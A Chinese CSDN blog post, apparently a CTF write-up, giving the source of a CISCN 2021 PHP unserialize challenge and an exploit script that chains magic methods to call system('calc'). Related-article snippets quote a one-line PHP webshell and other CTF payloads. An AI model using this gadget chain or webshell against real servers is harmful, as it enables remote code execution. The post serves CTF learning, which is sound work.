ciscn2021 反序列化

最新推荐文章于 2022-06-15 22:08:48 发布
最新推荐文章于 2022-06-15 22:08:48 发布
阅读量171 收藏
点赞数
分类专栏: 笔记 笔记 文章标签: ci php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45805993/article/details/118470559
版权

正好还留着当时的源码,先发一波

<?phpclass Fake{	public $firm;	public $test;	public function __set($firm,$test){	$test = "No,You can't";	$firm = unserialize($firm);	call_user_func($firm,$test);  }}class Temp{	public $pri;	public $fin=1;	public function __destruct()	{		$a=$this->action;       $this->pri->$a = $this->fin;	}}class OwO{    public $fc;    public $args;	function run()	{		return ($this->fc)($this->args);	}}$d = $_GET['poc'];unserialize($d);?>

脚本

<?php
class Fake
{	public $firm;
    public $test;
    public function __set($firm,$test)
    {
        $test = "No,You can't";
        $firm = unserialize($firm);
        call_user_func($firm,$test);
    }
}class Temp{
    public $pri;
    public $fin=1;
    public function __construct()
    {
        $fff=new OwO();
        $this->fin=$fff->run();
        $this->pri=new Fake();
        $this->action='firm';
    }

    public function __destruct()
    {
        $a=$this->action;
        $this->pri->$a = $this->fin;
    }
}class OwO{
    public $fc;
    public $args;
    public function __construct()
    {
        $this->fc='system';
        $this->args='calc';
    }

    function run()
    {
        return ($this->fc)($this->args);
    }
}
$d = new Temp();
$d=serialize($d);
unserialize($d);?>
ByNotD0g
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Cisco思科交换机怎么初始化?
10-01
Cisco思科交换机怎么初始化?交换机的类型很多,最常见的就是以太网交换机,但是交换机该怎么初始化呢?下面我们以Cisco思科交换机为例,分享交换机的初始化设置教程,需要的朋友可以参考下
2021-7-30 [CISCN2019 华北赛区 Day1 Web2]ikun 知识点:逻辑漏洞,JWT伪造,python-pickle反序列化
m0_51326092的博客
08-03 593
文章目录前言前置知识一、JWT二、Python-pickle反序列化解题过程总结 前言 一开始看到kunkun,好家伙,做着做着发现这真是道难题,好你个姬霓太美,太菜了不得不去看大佬wp,才发现是我从未体验过得全新知识点,针不搓呢!!! 前置知识 参考大佬博客: https://www.cnblogs.com/Cl0ud/p/12177062.html 一、JWT JWT解码网站 Json Web Token详解 JWT破解工具 二、Python-pickle反序列化 解题过程 总结 ...
2020/7/16 - [CISCN2019 华北赛区 Day1 Web2]ikun - admin伪造、python之pickle反序列化
抒情诗
07-16 348
文章目录1.跑出Lv6所在page2.购买lv63.伪造admin 1.跑出Lv6所在page 根据提示要找LV6,再根据以下写脚本。 import requests; url = 'http://d046240b-eee3-43a5-9b18-5a87217af228.node3.buuoj.cn/shop?page=' for i in range(0,1000): r = requests.get(url + str(i)) if 'lv6.png' in r.text:
2021CISCN RE WP
qq_45739995的博客
05-17 349
逆向题质量太高了,菜鸡比赛只做出来两个题。 其他的题会在赛后继续复现出来。 持续更新中… glass jeb打开主函数发现调用了native层 ida打开 输入长度39位 第一个函数跟进发现调用了rc4 第二个函数用v7对flag加密(数组移位+异或) 第三个直接对flag加密(三位一组进行加密处理+异或) 大体思路:根据已有的字符串,首先逆掉第三个函数 得到用rc4数组加密后的 然后求出rc4的数组 最后在第二个函数里进行异或拿到flag (变量名用的有点乱) #include<stdio.h&
2021CISCN-Re-gift
m0_51713041的博客
06-20 209
gift 拿到题目之后查壳发现是go语言编写的程序 运行发现会打印出flag的前面几个字节 CISCN{4b445b324 拖入IDA进行调试,发现那几个函数(main_CISCN6666666,main_CISCN66666666,main_CISCN6666666666)都执行很慢,查看发现调用了sleep函数 写个IDAPython脚本将其patch掉 for i in range(0x000000000054A265,0x000000000054A272): ida_bytes.patch
[CISCN2021]华北区_ctf_re_imnotavirus
qq_43583624的博客
06-21 1215
2021国赛CTF华北区_re_imnotavirus 题目来源和附件 Written by PoilZero(个人博客:http://poilzero.sipc115.club/) 同步转发到简书和CSDN 题目来源: 2021年第十四届全国大学生信息安全竞赛——创新实践能力赛 华北赛区 re方向第一题 imnotavirus 题目附件: https://poil.lanzoui.com/i0iImqjom6h 个人解题目录和部分所需程序: https://poil.lanzoui.com/i0
java 序列化的定义_Java的序列化和反序列化
weixin_39521835的博客
02-21 118
原标题:Java的序列化和反序列化1.序列化是干什么的?简单说就是为了保存在内存中的各种对象的状态,也就是实例变量,不是方法,并且可以把保存的对象状态再读出来。虽然你可以用你自己的各种各样的方法来保存object states,但是Java给你提供一种应该比你自己好的保存对象状态的机制,那就是序列化。 2.什么情况下需要序列化当你想把的内存中的对象状态保存到一个文件中或者数据库中时候;当你想用套接...
python建立数据库并序列化_python序列化
weixin_39662462的博客
12-06 96
python中存在三种序列化的方案(数据存储)在我们存储数据或者网络传输数据的时候. 需要对我们的对象进行处理. 把对象处理成方便存储和传输的数据格式. 这个过程叫序列化. 不同的序列化, 结果也不同. 但是目的是一样的. 都是为了存储和传输1. pickle. 可以将我们python中的任意数据类型转化成bytes并写入到文件中. 同样也可以把文件中写好的bytes转换回我们python的数据...
jQuey将序列化对象在前台显示地实现代码(方法总结)
01-19
序列化对象为单个对象的时候 //Student person = new Student() { Name = 张三,Code=001 }; //JavaScriptSerializer json = new JavaScriptSerializer(); //string str = json.Serialize(person); context....
Cisco AP初始化配置(以AP1815i为例)
04-25
Cisco AP初始化配置(以AP1815i为例)
Cisco交换机初始化过程跟踪
10-01
初始化过程只测试过Cisco 2960和3550系列交换机,至于其他的,还请广大网友不断发现
思科横向虚拟化(vDC)纵向虚拟化(vPC)配置
01-03
详解思科VDC和VPC配置,主要通过实验进行,主要为思科N5K和N7K针对N2K进行。
[CISCN 2021] 部分 write up
Anton__1的博客
05-16 687
easy_source 抓包扫目录干都干了,发现什么都拿不到 预期猜测flag在注释里(也给了提示): 你能发现我嘛 所以我们可以试着用PHP内置类中的ReflectionMetho来读取类中函数的注释: 参考自https://r0yanx.com/2020/10/28/fslh-writeup/ payload如下: ?rc=ReflectionMethod&ra=User&rb=a&rd=getDocComment 因为不知道到底在那个函数中,随即手工爆破直到拿到flag
萌新之php一句话木马(上传漏洞)
热门推荐
weixin_45805993的博客
11-09 1万+
0x00参考文章 https://www.cnblogs.com/wangtanzhi/p/12243206.html https://xz.aliyun.com/t/2435 https://blog.csdn.net/momo_sleet/article/details/82497520 0x01 什么是一句话木马 <?php @eval($_POST['hacker']); ?> 如上就是一句一句话木马,eval函数可以使php将post进去的内容当做代码处理 如果网站在用户上传文件时没
thinkphp5.1.37 可以读写文件 利用phar反序列化
weixin_45805993的博客
11-29 874
安洵杯一道题…一开始根本没想到用phar…还是太菜了 tp版本5.1.37TLS 源码 <?php namespace app\index\controller; use think\Controller; class Index extends controller { public function index() { return '<style type="text/css">*{ padding: 0; margin: 0; } div{ pad
wmctf2021 Flag Thief && 祥云杯 层层取证 && 陇剑杯 wifi && 羊城杯 辣鸡取证
weixin_45805993的博客
09-18 712
0x00我是菜鸡 这题算是做过的取证题里很复杂的了,拿出来复现一下 大部分内容参考了套神的博客,先贴在上面 https://blog.csdn.net/qq_42880719/article/details/120000111 0x01题解 因为没有取证大师,我这里先选择了用FTK挂载镜像 Hint:曾远程过其他电脑 从大神的博客学到这里大概有几种思路 1.default.rdp文件 2.注册表搜索Terminal Server Client 3.BMC 与bin缓存文件,可缓存远程桌面图片,文件位置:%
菜鸡的flask模板注入
weixin_45805993的博客
10-08 629
ssti:SSTI就是服务器端模板注入(Server-Side Template Injection),也给出了一个注入的概念,通过与服务端模板的 输入输出 交互,在过滤不严格的情况下,构造恶意输入数据,从而达到读取文件或者getshell的目的 因为flask使用Jinja2渲染引擎,可以在前端通过{{}}的形式使用变量或者{% %}执行python语句,存在注入的可能(不懂的话先去看flask!) 因为flask是用的python语言,所以python中的一些内置函数可以在flask中被使用,我们可以借
TCTF 1linephp
weixin_45805993的博客
07-08 540
0x00. 参考文档 https://gist.github.com/as3617/50d598ede736d81bc57804e4d19700e5#file-s-zip-hexcode https://github.com/waderwu/My-CTF-Challenges/blob/master/0ctf-2021/1linephp/writeup/1linephp_writeup_en.md 有点像defcon-2018 one_line_php 0x01.源码及原理 <?php ($_=@$_
pickle反序列化简析
weixin_45805993的博客
06-15 430
执行whoami/calc
python 思科交换机自动化备份
最新发布
10-24
Python思科交换机自动化备份是指使用Python编写脚本来实现思科交换机的自动备份操作。Python作为一种简单易用且强大的脚本语言,可以用于编写各种自动化任务的脚本,包括备份思科交换机的配置。 Python使用paramiko...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值